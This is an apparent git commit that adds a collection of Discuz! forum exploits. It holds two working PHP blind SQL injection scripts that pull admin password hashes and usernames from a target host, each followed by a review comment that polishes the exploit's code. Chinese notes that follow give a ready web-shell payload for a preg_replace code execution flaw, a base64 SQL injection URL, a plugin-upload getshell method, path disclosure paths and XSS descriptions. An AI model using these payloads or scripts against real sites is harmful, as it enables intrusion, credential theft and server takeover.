update Discuz exp

This commit is contained in:
helloexp 2022-01-13 17:40:20 +08:00
parent 5f980051d0
commit fe482e9c74
27 changed files with 1294 additions and 0 deletions


257
CMS/Discuz/discuz.php Normal file

@ -0,0 +1,257 @@
<?php
print_r('
---------------------------------------------------------------------------
Discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dorks: "powered by discuz! 5.0.0
"powered by discuz!
---------------------------------------------------------------------------
');
if ($argc<3) {
print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to discuz
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /discuz/ -P1.1.1.1:80
php '.$argv[0].' localhost /discuz/ -p81
---------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "please wait...\n";
//from global.func.php
function authcode($string, $operation, $key = '') {
$key = $key ? $key : $GLOBALS['discuz_auth_key'];
$coded = '';
$keylength = 32;
$string = $operation == 'DECODE' ? base64_decode($string) : $string;
for($i = 0; $i < strlen($string); $i += 32) {
$coded .= substr($string, $i, 32) ^ $key;
}
$coded = $operation == 'ENCODE' ? str_replace('=', '', base64_encode($coded)) : $coded;
return $coded;
}
//stolen from install.php
function random($length) {
$hash = '';
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
$max = strlen($chars) - 1;
mt_srand((double)microtime() * 1000000);
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
}
return $hash;
}
$agent="Googlebot/2.1";
//see sql errors... you need auth key,
//it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;)
$tt="";for ($i=0; $i<=255; $i++){$tt.=chr($i);}
while (1)
{
$discuz_auth_key=random(32);
$packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n";
$packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof
$packet.="User-Agent: $agent\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$tt,"ENCODE").";\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$html=html_entity_decode($html);
$html=str_replace("<br />","",$html);
$t=explode("AND m.password='",$html);
$t2=explode("' ",$t[1]);
$pwd_f=$t2[0];
$t=explode("AND m.secques='",$html);
$t2=explode("'\n",$t[1]);
$secques_f=$t2[0];
$t=explode("AND m.uid='",$html);
$t2=explode("'\x0d",$t[1]);
$uid_f=$t2[0];
$my_string=$pwd_f."\t".$secques_f."\t".$uid_f;
if ((strlen($my_string)==270) and (!eregi("=",$my_string))){
break;
}
}
$temp = authcode("suntzu\tsuntzu\t".$tt,"ENCODE");
//calculating key...
$key="";
for ($j=0; $j<32; $j++){
for ($i=0; $i<255; $i++){
$aa="";
if ($j<>0){
for ($k=1; $k<=$j; $k++){
$aa.="a";
}
}
$GLOBALS['discuz_auth_key']=$aa.chr($i);
$t = authcode($temp,"DECODE");
if ($t[$j]==$my_string[$j]){
$key.=chr($i);
}
}
}
//echo "AUTH KEY ->".$key."\r\n";
$GLOBALS['discuz_auth_key']=$key;
echo "pwd hash (md5) -> ";
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
//you can use every char because of base64_decode()...so this bypass magic quotes...
//and some help by extract() to overwrite vars
$sql="999999'/**/UNION/**/SELECT/**/'tOe7fl',1,s.groupid='6'/**/AS/**/ipbanned,1,0,20366,1,'suntzu','aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa','',1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
$packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n";
$packet.="User-Agent: $agent\r\n";
$packet.="CLIENT-IP: 1.2.3.4\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("action=groupexpiry",$html)){
$password.=chr($i);echo chr($i);sleep(1);break;
}
}
if ($i==255) {
die("\nExploit failed...");
}
}
$j++;
}
echo "\nadmin user -> ";
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql="999999'/**/UNION/**/SELECT/**/'tOe7fl',1,s.groupid='6'/**/AS/**/ipbanned,1,0,20366,1,'suntzu','aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa','',1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
$packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n";
$packet.="User-Agent: $agent\r\n";
$packet.="CLIENT-IP: 1.2.3.4\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("action=groupexpiry",$html)){
$admin.=chr($i);echo chr($i);sleep(1);break;
}
if ($i==255) {die("\nExploit failed...");}
}
$j++;
}
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {
echo "exploit succeeded...";
}
else {
echo "exploit failed...";
}
?>
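Review bot: `$packet.=$data;` in each of the three request builders appends a variable that is never assigned anywhere in the file, so the line is a silent no-op that only passes unnoticed because of `error_reporting(0)` at the top; either drop the three lines or declare the value they were meant to carry. `authcode` has the same kind of dead code: `$keylength = 32;` is set and never read, while the loop hard-codes `32` in two places, so `for($i = 0; $i < strlen($string); $i += $keylength)` and `substr($string, $i, $keylength)` would at least make the constant meaningful. `is_hash` is defined after its only call site and wraps a boolean in an `if`/`else`; `return (bool) ereg(...)` placed with the other helpers reads more clearly.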


@ -0,0 +1,13 @@
DZ(discuz) x2.5 爆路径漏洞 0day
/* just for search
DZ x2.5 爆路径 绝对路径 dzx2.5爆路径 dz2.5爆路径 dz x.25 Dz x.25 DZ 2.5
*/
白肚 & 股沟 没找到dzx2.5的爆路径的漏洞 遂拿自己写的那个白盒测试挖洞辅助工具
果断秒杀之 发出来共享之
爆路径文件如下:
/uc_server/control/admin/db.php
/source/plugin/myrepeats/table/table_myrepeats.php
/install/include/install_lang.php


@ -0,0 +1,153 @@
DZ2.5 最新0day漏洞exp
漏洞标题: Discuz!X2.5Release20120407版命令执行
漏洞文件upload\source\class\helper\helper_seo.php
在后台设置了,前台就能通过添加特殊内容进行命令执行
先上图后上代码 大家目测吧
PS: Discuz!是开源产品,很容易通过对比的手段找到以前的修正过的问题,希望相关的站长做好升级
'---------------------------------------------------------------------------------------------------
if(!defined(IN_DISCUZ)) {
@@ -89,7 +89,7 @@
}
}
if($searcharray && $replacearray) {
- $content = preg_replace(“/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies”, helper_seo::base64_transform(“encode”, “”, “\\1\\2\\3″, “”), $content);
+ $content = preg_replace(“/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies”, “helper_seo::base64_transform(encode, ”, \\1\\2\\3, ”)”, $content);
$content = preg_replace($searcharray, $replacearray, $content, 1);
$content = preg_replace(“/(.*?)/ies”, “helper_seo::base64_transform(decode, ”, \\1, ”)”, $content);
}
@@ -100,7 +100,7 @@///www.hake.cc
public static function base64_transform($type, $prefix, $string, $suffix) {
if($type == encode) {
- return $prefix.base64_encode(str_replace(“\’”, “‘”, $string)).$suffix; // -
+ return $prefix.base64_encode(str_replace(“\\\”", “\”", $string)).$suffix;
} elseif($type == decode) {
return $prefix.base64_decode($string).$suffix;
}
够清楚吧,问题在/source/class/helper/helper_seo.php 92行附近的
1
$content = preg_replace(“/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies”, helper_seo::base64_transform(“encode”, ““, “\\1\\2\\3″, ““), $content);
preg_replace 使用了e修正符又是双引号所以导致远程任意代码执行。
需要论坛支持个功能啥功能看68行 $_G['cache']['relatedlink']grep下relatedlink一路跟具体代码先不贴找到需要后台开个seo功能在运营-关联链接 /admin.php?frames=yes&action=misc&operation=relatedlink且至少需要设置一个链接这功能不是所有管理员都开但是我觉得大部分都会开如果不开它就只能是个后台拿shell的tips了。
1
2
3
4
function_core.php 1925
function parse_related_link($content, $extent) {
return helper_seo::parse_related_link($content, $extent);
}
看正则
“/(.*?)|()|(\[attach\](\d+)\[\/attach\])/ies”
PS 影响版本有Discuz!X2.5Release20120407betarc 版命令执行
1.注册任意账户
2.登陆用户发表blog日志注意是日志
3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
4.访问日志论坛根目录下生成demo.php一句发密码c
那么利用方式还用说么? 各种地方比如 source/include/space/space_blog.php 的checkhtml 函数
同样本人贴出相关代码提供大家大牛参考 请大牛不要D小站 本站只是发表文章 不防D的 一D就挂
function checkhtml($html) {
if(!checkperm('allowhtml')) {
preg_match_all("/\<([^\<]+)\>/is", $html, $ms);
$searchs[] = '<';
$replaces[] = '<';
$searchs[] = '>';
$replaces[] = '>';
if($ms[1]) {
$allowtags = 'img|a|font|div|table|tbody|caption|tr|td|th|br|p|b|strong|i|u|em|span|ol|ul|li|blockquote|object|param|embed';
$ms[1] = array_unique($ms[1]);
foreach ($ms[1] as $value) {
$searchs[] = "<".$value.">";
$value = str_replace('&', '_uch_tmp_str_', $value);
$value = dhtmlspecialchars($value);
$value = str_replace('_uch_tmp_str_', '&', $value);
$value = str_replace(array('\\','/*'), array('.','/.'), $value);
$skipkeys = array('onabort','onactivate','onafterprint','onafterupdate','onbeforeactivate','onbeforecopy','onbeforecut','onbeforedeactivate',
'onbeforeeditfocus','onbeforepaste','onbeforeprint','onbeforeunload','onbeforeupdate','onblur','onbounce','oncellchange','onchange',
'onclick','oncontextmenu','oncontrolselect','oncopy','oncut','ondataavailable','ondatasetchanged','ondatasetcomplete','ondblclick',
'ondeactivate','ondrag','ondragend','ondragenter','ondragleave','ondragover','ondragstart','ondrop','onerror','onerrorupdate',
'onfilterchange','onfinish','onfocus','onfocusin','onfocusout','onhelp','onkeydown','onkeypress','onkeyup','onlayoutcomplete',
'onload','onlosecapture','onmousedown','onmouseenter','onmouseleave','onmousemove','onmouseout','onmouseover','onmouseup','onmousewheel',
'onmove','onmoveend','onmovestart','onpaste','onpropertychange','onreadystatechange','onreset','onresize','onresizeend','onresizestart',
'onrowenter','onrowexit','onrowsdelete','onrowsinserted','onscroll','onselect','onselectionchange','onselectstart','onstart','onstop',
'onsubmit','onunload','javascript','script','eval','behaviour','e-xpression','style','class');
$skipstr = implode('|', $skipkeys);
$value = preg_replace(array("/($skipstr)/i"), '.', $value);
if(!preg_match("/^[\/|\s]?($allowtags)(\s+|$)/is", $value)) {
$value = '';
}
$replaces[] = empty($value)?'':"<".str_replace('"', '"', $value).">";
}
}
$html = str_replace($searchs, $replaces, $html);
}
return $html;
}


@ -0,0 +1,69 @@
Discuz X2.5 最新GetShell 0day 详细利用方法
听说Discuz!这次又出漏洞了这次还是个GetShell漏洞呀。这个漏洞比较新应该很多站还没更新吧。影响版本有20120407betarc
Discuz! X2.5 Release 20120407版中的preg_replace使用了e修饰符和双引号
在实现上存在远程命令执行漏洞,远程攻击者可利用此漏洞执行远程任意代码。
要成功利用此漏洞需要目标启用seo功能。
下面说下利用方法
1.注册任意账户
2.登陆用户发表blog日志注意是日志
3.添加图片,选择网络图片,地址写入 ↓
{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
4.访问日志论坛根目录下生成demo.php一句发密码c
漏洞要开启seo并且开启用户日志的seo漏洞鸡肋黑站就算了。
补充一下吧开seo没错但是并非他说的非得开日志的seo我上面文章中说的 “各种地方比如 source/include/space/space_blog.php
懂的都懂了” 只是随便提个例子而已,其实在任何能够发表文章的地方都可以,最简单的,论坛找个板块发贴子就行,
这主要看管理员开启了哪个位置的seo如果不知道管理员开了哪的seo就到处都发一下。
利用方式也并非非得发blog也不是非得发网络图片详细的利用我是比如随便发个贴子内容
${${eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59))}}
然后给他加上任意超链接发布即可phpinfo()enjoy it :)


@ -0,0 +1,5 @@
Discuz X2.5最新版爆路径0day漏洞
漏洞证明http://www.erdare.com/source/plugin/myrepeats/table/table_myrepeats.php
修复方案:加!defined(IN_UC) && exit(Access Denied);就好了


@ -0,0 +1,19 @@
Discuz! X2.5 类似鸡肋存储Xss
漏洞详情
披露状态:
2012-09-16 细节已通知厂商并且等待厂商处理中
2012-09-21 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
鸡肋存储XSS
详细说明:
貌似鸡肋,因为要造成XSS是需要有一定的权限比如论坛的斑竹什么的普通会员的话好像不行因为存在XSS的地方是一个转账功能而在此转账功能下面还有一个留言框而造成XSS的就是这个留言框。此留言框未做任务过滤处理。经测试用一个有权限的帐号给一个普通帐号转账附带留言XSS.可成功获取cookie.


@ -0,0 +1,6 @@
Discuz! X2.5 远程代码执行漏洞
测试方法:
@Sebug.net dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!1.1.注册任意账户2.2.登陆用户发表blog日志注意是日志3.3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}4.4.访问日志论坛根目录下生成demo.php一句话密码C


@ -0,0 +1,21 @@
DiscuzX2个人空间图片EXIF信息XSS
简要描述:
DiscuzX2个人空间图片EXIF信息XSS
详细说明:
图片里插入非法的EXIF信息。你懂的
xss漏洞产生。。。不过有点鸡肋在特定条件下才能读取到EXIF信息。
漏洞证明:
图片里插入非法的EXIF信息。你懂的


@ -0,0 +1,10 @@
discuz X25 某功能存在 xss漏洞
简要描述:
discuz X25 某功能存在 xss漏洞 html 脚本未过滤
详细说明:
discuz X25 广播回复存在 xss漏洞 html、脚本未过滤


@ -0,0 +1,12 @@
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day
discuz x1.5 discuz 7.2 后台getshell 0day通杀版
方法为:
后台:插件--添加插件--请选择导入方式:上传本帖附件中的XML文件 并同时勾选上 允许导入不同版本 Discuz! 的插件(易产生错误!!)
然后确认
shell地址就为data/plugindata/shell.lang.php (discuz x1.5 )
shell地址就为forumdata/plugins/shell.lang.php (discuz 7.2)
http://www.st999.cn/blog/tools/discuzshell.rar


@ -0,0 +1,29 @@
discuz!X2.0 SQL injection
文件source\module\forum\forum_attachment.php
if(!defined('IN_DISCUZ')) {
exit('Access Denied');
}
define('NOROBOT', TRUE);
@list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'], $_G['gp_tableid']) = explode('|', base64_decode($_G['gp_aid']));
if(!empty($_G['gp_findpost']) && ($attach = DB::fetch_first("SELECT pid, tid FROM ".DB::table('forum_attachment')." WHERE aid='$_G[gp_aid]'"))) {9 d3 c J: W& N) ~ H9 A$ ^
dheader('location: forum.php?mod=redirect&goto=findpost&pid='.$attach['pid'].'&ptid='.$attach['tid']);
};
变量aid 直接base64_decode 后传入 SQL查询造成注射漏洞。。。
http://www.xxxx.net/aforum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eHx4fHg%3D
转向后网址
http://www.xxxx.net/forum.php?mod=redirect&goto=findpost&pid=1&ptid=pre_common_admincp_member
暴出表名 pre_common_admincp_member
实际查询为:
$x="1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like '%_member|x|x|x|x";
//die (urlencode(base64_encode($x)));
本文来源于独自等待博客http://www.waitalone.cn/ 原文地址http://www.waitalone.cn/post/908.html

255
CMS/Discuz/discuz4.1.php Normal file

@ -0,0 +1,255 @@
<?php
print_r('
---------------------------------------------------------------------------
Discuz! 4.x SQL injection / admin credentials disclosure exploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dork: "powered by discuz!
---------------------------------------------------------------------------
');
if ($argc<3) {
print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to discuz
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /discuz/ -P1.1.1.1:80
php '.$argv[0].' localhost /discuz/ -p81
---------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "please wait...\n";
//from global.func.php
function authcode($string, $operation, $key = '') {
$key = $key ? $key : $GLOBALS['discuz_auth_key'];
$coded = '';
$keylength = 32;
$string = $operation == 'DECODE' ? base64_decode($string) : $string;
for($i = 0; $i < strlen($string); $i += 32) {
$coded .= substr($string, $i, 32) ^ $key;
}
$coded = $operation == 'ENCODE' ? str_replace('=', '', base64_encode($coded)) : $coded;
return $coded;
}
//stolen from install.php
function random($length) {
$hash = '';
$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
$max = strlen($chars) - 1;
mt_srand((double)microtime() * 1000000);
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
}
return $hash;
}
$agent="Googlebot/2.1";
//see sql errors... you need auth key,
//it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;)
$tt="";for ($i=0; $i<=255; $i++){$tt.=chr($i);}
while (1)
{
$discuz_auth_key=random(32);
$packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n";
$packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof
$packet.="User-Agent: $agent\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$tt,"ENCODE").";\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$html=html_entity_decode($html);
$html=str_replace("<br />","",$html);
$t=explode("AND m.password='",$html);
$t2=explode("' ",$t[1]);
$pwd_f=$t2[0];
$t=explode("AND m.secques='",$html);
$t2=explode("'\n",$t[1]);
$secques_f=$t2[0];
$t=explode("AND m.uid='",$html);
$t2=explode("'\x0d",$t[1]);
$uid_f=$t2[0];
$my_string=$pwd_f."\t".$secques_f."\t".$uid_f;
if ((strlen($my_string)==270) and (!eregi("=",$my_string))){
break;
}
}
$temp = authcode("suntzu\tsuntzu\t".$tt,"ENCODE");
//calculating key...
$key="";
for ($j=0; $j<32; $j++){
for ($i=0; $i<255; $i++){
$aa="";
if ($j<>0){
for ($k=1; $k<=$j; $k++){
$aa.="a";
}
}
$GLOBALS['discuz_auth_key']=$aa.chr($i);
$t = authcode($temp,"DECODE");
if ($t[$j]==$my_string[$j]){
$key.=chr($i);
}
}
}
//echo "AUTH KEY ->".$key."\r\n";
$GLOBALS['discuz_auth_key']=$key;
echo "pwd hash (md5) -> ";
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
//you can use every char because of base64_decode()...so this bypass magic quotes...
//and some help by extract() to overwrite vars
$sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
$packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n";
$packet.="User-Agent: $agent\r\n";
$packet.="CLIENT-IP: 1.2.3.4\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("action=groupexpiry",$html)){
$password.=chr($i);echo chr($i);sleep(1);break;
}
}
if ($i==255) {
die("\nExploit failed...");
}
}
$j++;
}
echo "\nadmin user -> ";
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
$packet ="GET ".$p."admincp.php?action=recyclebin& HTTP/1.0\r\n";
$packet.="User-Agent: $agent\r\n";
$packet.="CLIENT-IP: 1.2.3.4\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("action=groupexpiry",$html)){
$admin.=chr($i);echo chr($i);sleep(1);break;
}
if ($i==255) {die("\nExploit failed...");}
}
$j++;
}
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {
echo "exploit succeeded...";
}
else {
echo "exploit failed...";
}
?>
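Review bot: This file repeats CMS/Discuz/discuz.php almost line for line — `quick_dump`, `sendpacketii`, `authcode`, `random`, the option parsing and `is_hash` are byte-identical copies, and only the banner text and the two `$sql` string literals differ. Two copies mean any correction lands in one and not the other; the shared helpers belong in one included file, leaving the version-specific literals as the only per-file content. The same unassigned `$data` appended to each `$packet` and the unused `$keylength` local in `authcode` are carried over here as well.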


@ -0,0 +1,25 @@
Discuz 某插件SQL注入漏洞
漏洞详情
披露状态:
2012-08-15 细节已通知厂商并且等待厂商处理中
2012-08-20 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
Discuz某插件SQL注入漏洞
详细说明:
可注入点xxxx/plugin.php
可注入参数imesljtypem,orderby,page,telid
漏洞证明:
贴一个ljtype的
随便找一个


@ -0,0 +1,213 @@
Discuz! 7.1 & 7.2 远程代码执行漏洞
别说明:产生漏洞的$scriptlang数组在安装插件后已经初始化因此有安装插件的用户不受影响。
漏洞介绍:
Discuz新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化可以任意提交从而可以执行任意PHP命令。
漏洞分析:
下面来分析下这个远程代码执行漏洞这个问题真的很严重可以直接写shell的
一、漏洞来自showmessage函数
function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) {
extract($GLOBALS, EXTR_SKIP);//危险的用法未初始化的变量可以直接带进函数直接导致了问题产生from www.oldjun.com
global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;
define('CACHE_FORBIDDEN', TRUE);
$hookscriptmessage = $show_message = $message;$messagehandle = 0;
$msgforward = unserialize($_DCACHE['settings']['msgforward']);
$refreshtime = intval($msgforward['refreshtime']);
$refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
$msgforward['refreshtime'] = $refreshtime * 1000;
$url_forward = empty($url_forward) ? '' : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);
$seccodecheck = $seccodestatus & 2;
if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {
$statlogfile = DISCUZ_ROOT.'./forumdata/funcstat.log';
if($fp = @fopen($statlogfile, 'a')) {
@flock($fp, 2);
if(is_array($funcstatinfo)) {
$funcstatinfo = array_unique($funcstatinfo);
foreach($funcstatinfo as $funcinfo) {
fwrite($fp, funcstat_query($funcinfo, $message)."\n");
}
} else {
fwrite($fp, funcstat_query($funcstatinfo, $message)."\n");
}
fclose($fp);
$funcstatinfo = $GLOBALS['funcstatinfo'] = '';
}
}
